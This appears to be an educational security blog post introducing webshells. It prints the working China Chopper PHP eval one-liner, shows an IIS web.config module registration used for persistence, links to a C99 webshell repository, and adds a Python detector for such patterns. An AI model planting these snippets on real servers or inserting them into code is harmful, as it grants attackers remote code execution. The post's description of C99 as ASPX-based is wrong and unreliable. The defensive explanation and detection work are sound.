An intro to Webshells

Introduction

Webshells, a deceptively simple yet powerful tool in the hands of cyber adversaries, pose a critical threat to web servers and the data they hold. These malicious scripts are planted in vulnerable web applications, giving attackers unauthorised remote access. In this technical blog, we will explore the inner workings of common webshells such as PHP-based China Chopper and ASPX-based C99, understand their functionality, and see how they can persist on IIS servers. By dissecting these stealthy threats, we aim to give cybersecurity professionals the knowledge needed to safeguard web infrastructures effectively.

Webshell Fundamentals

Webshells are lightweight scripts or code snippets that attackers plant through web application vulnerabilities such as SQL injection or Remote File Inclusion (RFI). Once in place they are reached over ordinary HTTP, letting the attacker interact with the compromised server remotely through the web server itself.

The China Chopper Webshell

China Chopper, a widely used PHP-based webshell, is notorious for its compact size and evasive capabilities. Let’s examine a simplified version of its code:

<?php @eval($_POST['password']);?>

When planted in a vulnerable web application, this one-liner takes whatever arrives in the POST parameter named “password” (the parameter name acts as the webshell’s password) and passes it to eval(), allowing attackers to execute arbitrary PHP code on the server and read back the output. The leading @ suppresses any PHP error messages that might otherwise reveal its presence.

The C99 ASPX Webshell

The C99 webshell, written in ASPX, is another prevalent threat targeting Microsoft IIS servers. Its functionality is more extensive than China Chopper, enabling file management, database interactions, and more. Code can be found at https://github.com/dangerover/r57c99/

Once embedded into an ASPX-based web application, C99 can execute arbitrary commands and interact with the server’s filesystem and resources.

Evasion Techniques

Webshells utilise evasion techniques to avoid detection by security solutions and administrators. These tactics include obfuscating the code, using encrypted communication channels, and employing random names and locations to make detection more challenging.

Linkage to IIS Servers

To persist on IIS servers, a webshell can hook into the request pipeline by registering itself as an IIS module in web.config. Because registered modules run for every HTTP request, the webshell’s code executes with each request the server handles:

<configuration>
    <system.webServer>
        <modules>
            <add name="WebShellModule" type="WebShellHandler, WebShellModule" preCondition="managedHandler" />
        </modules>
    </system.webServer>
</configuration>

This IIS module registration lets the webshell intercept every incoming request, execute its malicious code, and maintain unauthorised access for as long as the entry remains in the configuration.
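To turn the two patterns above into something a defender can run, here is an added Python example (not code from the original post): it flags PHP sources where a code-execution sink is fed straight from a request superglobal, as in the China Chopper one-liner, and lists the modules a web.config registers so they can be compared against an administrator's allowlist. The sample PHP, the sample web.config and the allowlist are constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample inputs for the demonstration (not taken from a real host).
SAMPLE_PHP = "<?php @eval($_POST['password']);?>"
SAMPLE_WEB_CONFIG = """<configuration>
    <system.webServer>
        <modules>
            <add name="WebShellModule" type="WebShellHandler, WebShellModule" preCondition="managedHandler" />
        </modules>
    </system.webServer>
</configuration>"""

# A code- or command-execution sink whose argument comes directly from request data.
# This is the shape of China Chopper: eval($_POST['...']) with optional '@' error suppression.
WEBSHELL_SINK = re.compile(
    r"(?:@\s*)?\b(eval|assert|system|passthru|shell_exec|exec)\s*\(\s*"
    r"(?:@\s*)?\$_(POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def find_php_sinks(source: str) -> list[str]:
    """Return one 'sink(SUPERGLOBAL)' tag per suspicious construct found in PHP source."""
    return [f"{m.group(1).lower()}({m.group(2).upper()})" for m in WEBSHELL_SINK.finditer(source)]


def list_modules(web_config_xml: str) -> list[dict]:
    """Return the attributes of every <add> under system.webServer/modules in a web.config."""
    root = ET.fromstring(web_config_xml)
    return [dict(el.attrib) for el in root.iterfind("./system.webServer/modules/add")]


def unexpected_modules(web_config_xml: str, allowlist: set[str]) -> list[str]:
    """Names of registered modules that are not on the known-good allowlist."""
    return [m.get("name", "?") for m in list_modules(web_config_xml) if m.get("name") not in allowlist]


if __name__ == "__main__":
    print("PHP sinks:", find_php_sinks(SAMPLE_PHP))
    # Hypothetical allowlist: replace with the module names your baseline actually contains.
    print("Unexpected modules:", unexpected_modules(SAMPLE_WEB_CONFIG, {"DefaultDocumentModule"}))
```

Run the same two functions over a web root and its web.config files on a schedule and alert on any new result; a module entry nobody on the team can account for deserves the same urgency as a suspicious script file.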

Conclusion

Webshells, represented by China Chopper and C99, embody the stealthy and ever-evolving threat landscape faced by web servers and applications. Their lightweight nature and evasion techniques make them elusive adversaries. Understanding the intricacies of these webshells and their linkage to IIS servers is paramount for fortifying web infrastructures. Cybersecurity professionals must deploy rigorous audits, code reviews, and web application firewalls to detect and mitigate webshell intrusions proactively. Staying ahead of the constantly evolving webshell landscape will empower organisations to secure their web servers, preserving data integrity and mitigating the risk of crippling cyberattacks. Vigilance, combined with technical expertise, is the ultimate defense against these stealthy cyber adversaries.